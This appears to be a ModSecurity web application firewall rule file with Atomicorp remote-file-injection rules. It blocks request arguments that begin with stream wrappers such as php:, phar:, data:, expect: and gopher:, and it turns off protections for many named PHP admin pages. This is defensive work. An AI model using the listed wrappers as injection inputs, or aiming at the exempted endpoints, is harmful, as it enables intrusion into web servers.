SecRule REQUEST_URI|ARGS|!ARGS:/^list/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/img/|!ARGS:api|!ARGS:/uri/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336138,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"


SecMarker END_RULES_92079

SecRule REQUEST_FILENAME "/admin/contenu/modif/" "phase:2,id:92080,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/processproperty\.php" "phase:2,id:92081,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/newsletter/envoi\.php" "phase:2,id:92082,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/extplorer/index\.php" "phase:2,id:92083,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/administrator/functions/update_article\.ph" "phase:2,id:92084,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/functions/client\.php" "phase:2,id:92085,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
SecAction "phase:2,id:92086,t:none,pass,nolog,skipAfter:END_RULES_92086"


SecRule REQUEST_URI|ARGS|!ARGS:info "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336139,t:none,t:urlDecodeUni,t:normalisePath,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:info "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336140,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"


SecMarker END_RULES_92086

SecRule REQUEST_FILENAME "/op\.php" "phase:2,id:92087,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340195"

SecRule REQUEST_FILENAME "/mod_raxo_allmode/tools/tb\.php" "phase:2,id:92088,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
SecAction "phase:2,id:92089,t:none,pass,nolog,skipAfter:END_RULES_92089"


SecRule REQUEST_URI|ARGS|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336240,t:none,t:urlDecodeUni,t:normalisePath,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336241,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"


SecMarker END_RULES_92089

SecRule REQUEST_FILENAME "/edit_offer\.php" "phase:2,id:92090,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/foto-graveren\.php" "phase:2,id:92091,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
SecAction "phase:2,id:92092,t:none,pass,nolog,skipAfter:END_RULES_92092"


SecRule REQUEST_URI|ARGS|!ARGS:/afbeelding/|!ARGS:/foto/|!ARGS:/Photo/|!ARGS:/image/|!ARGS:/img/|!ARGS:src|!ARGS:/^MA/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336242,t:none,t:urlDecodeUni,t:normalisePath,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:/afbeelding/|!ARGS:/foto/|!ARGS:/Photo/|!ARGS:/image/|!ARGS:/img/|!ARGS:src|!ARGS:/^MA/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336243,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"


SecMarker END_RULES_92092

SecRule REQUEST_FILENAME "/beta_new_update\.php" "phase:2,id:92093,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/webdav\.php" "phase:2,id:92094,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=392301"

SecRule REQUEST_FILENAME "/sassistant/monitoring\.php" "phase:2,id:92095,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709"
SecAction "phase:2,id:92096,t:none,pass,nolog,skipAfter:END_RULES_92096"


SecRule REQUEST_URI|ARGS|!ARGS:/monitor/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336244,t:none,t:urlDecodeUni,t:normalisePath,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:/monitor/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336245,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"


SecMarker END_RULES_92096

SecRule REQUEST_FILENAME "/admin/printdeexpediat\.php" "phase:2,id:92097,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/shop/presta_admin/index\.php" "phase:2,id:92098,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/adduserplugin\.php" "phase:2,id:92099,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/edithtmlblob\.php" "phase:2,id:92100,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390727"

SecRule REQUEST_FILENAME "/video_admin/editvideo/" "phase:2,id:92101,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/administrator/functions/update_article\.php" "phase:2,id:92102,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390727,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/catalog/admbre/categories\.php" "phase:2,id:92103,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/send_weeklyadlist\.php" "phase:2,id:92104,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390727"

SecRule REQUEST_FILENAME "/admin-edit\.php" "phase:2,id:92105,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "/admin/producto\.php" "phase:2,id:92106,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390614"

SecRule REQUEST_FILENAME "/service/psnabe/clientsservices\.php" "phase:2,id:92107,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/wp-admin/options-permalink\.php" "phase:2,id:92108,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704"

SecRule REQUEST_FILENAME "/ga\.php" "phase:2,id:92109,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/server_databases\.php" "phase:2,id:92110,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/amember/admin/email\.php" "phase:2,id:92111,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/send_weeklyadlist\.php" "phase:2,id:92112,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/support/agent/index\.php" "phase:2,id:92113,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/web-services/emailme\.php" "phase:2,id:92114,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/we_cmd\.php" "phase:2,id:92115,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/manage_news\.php" "phase:2,id:92116,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/admin/addersivu\.php" "phase:2,id:92117,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/vqgen/" "phase:2,id:92118,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/hallinta/kirjailija\.php" "phase:2,id:92119,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/json-api/cpanel" "phase:2,id:92120,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:92121,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "extplorer/index\.php" "phase:2,id:92122,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/wp-content/themes/oakland/theme/functions/upload\.php" "phase:2,id:92123,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/acp/vbshout\.php" "phase:2,id:92124,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "/property\.php" "phase:2,id:92125,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:92126,t:none,pass,nolog,skipAfter:END_RULES_92126"


SecRule ARGS|!ARGS:id|!ARGS:kotisivu|!ARGS:mb|!ARGS:jibber|!ARGS:pattern_select|!ARGS:wordpress_extra|!ARGS:origin|!ARGS:fail|!ARGS:success|!ARGS:move_to|!ARGS:/^listingfields/|!ARGS:svc_id|!ARGS:/^constant_contact/|!ARGS:hq|!ARGS:/flsrv/|!ARGS:svc_id|!ARGS:junkWords|!ARGS:/foto/|!ARGS:/^attr_/|!ARGS:name_ip|!ARGS:/stream/|!ARGS:canonical|!ARGS:/addy/|!ARGS:rel_path|!ARGS:aim|!ARGS:api|!ARGS:details|!ARGS:/^field/|!ARGS:profile_id|!ARGS:/^complete_action/|!ARGS:/^option_value/|!ARGS:/buzz/|!ARGS:cc_list_id|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:^/xcpr_/|!ARGS:back|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:catalogue_search_code|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:service|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:/^input_/|!ARGS:embed_code|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:refsrc|!ARGS:hp|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:input_3|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:sfhome|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:loc|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/photo/|!ARGS:/logo/|!ARGS:go|!ARGS:/^utm/|!ARGS:resolution|!ARGS:/export/|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:/click/|!ARGS:rf|!ARGS:payment_home|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:/body/|!ARGS:/^product_long_/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:pathToPiwik|!ARGS:admin_footer|!ARGS:email_sig|!ARGS:/^artsee_banner_/|!ARGS:pingback_service|!ARGS:showStr|!ARGS:/hostname/|!ARGS:/http/|!ARGS:bannercode|!ARGS:email_forward|!ARGS:fetch|!ARGS:/txt/|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:advBannerMessage|!ARGS:u|!ARGS:/header/|!ARGS:action|!ARGS:cptpl_dir|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:/link/|!ARGS:faqText|!ARGS:request_uri|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:dynadata[_SIGNATURE]|!ARGS:paypal_ipn|!ARGS:title|!ARGS:/frame/|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:wp_home|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:base1|!ARGS:layout|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:option[home]|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:short_story|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:option[78]|!ARGS:agendWebPage|!ARGS:/icon/|!ARGS:/ftp/|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:note|!ARGS:c_msg|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:home|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:helpbox|!ARGS:ureferrer|!ARGS:redir|!ARGS:refertoyouby|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:notes|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:refer|!ARGS:oldmsg|!ARGS:/referer/|!ARGS:/refer/|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:ret|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:home_top|!ARGS:Store_OUI_GlobalFooter|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:320162,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,chain,rev:287,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/" "t:none,t:urlDecodeUni,t:lowercase"

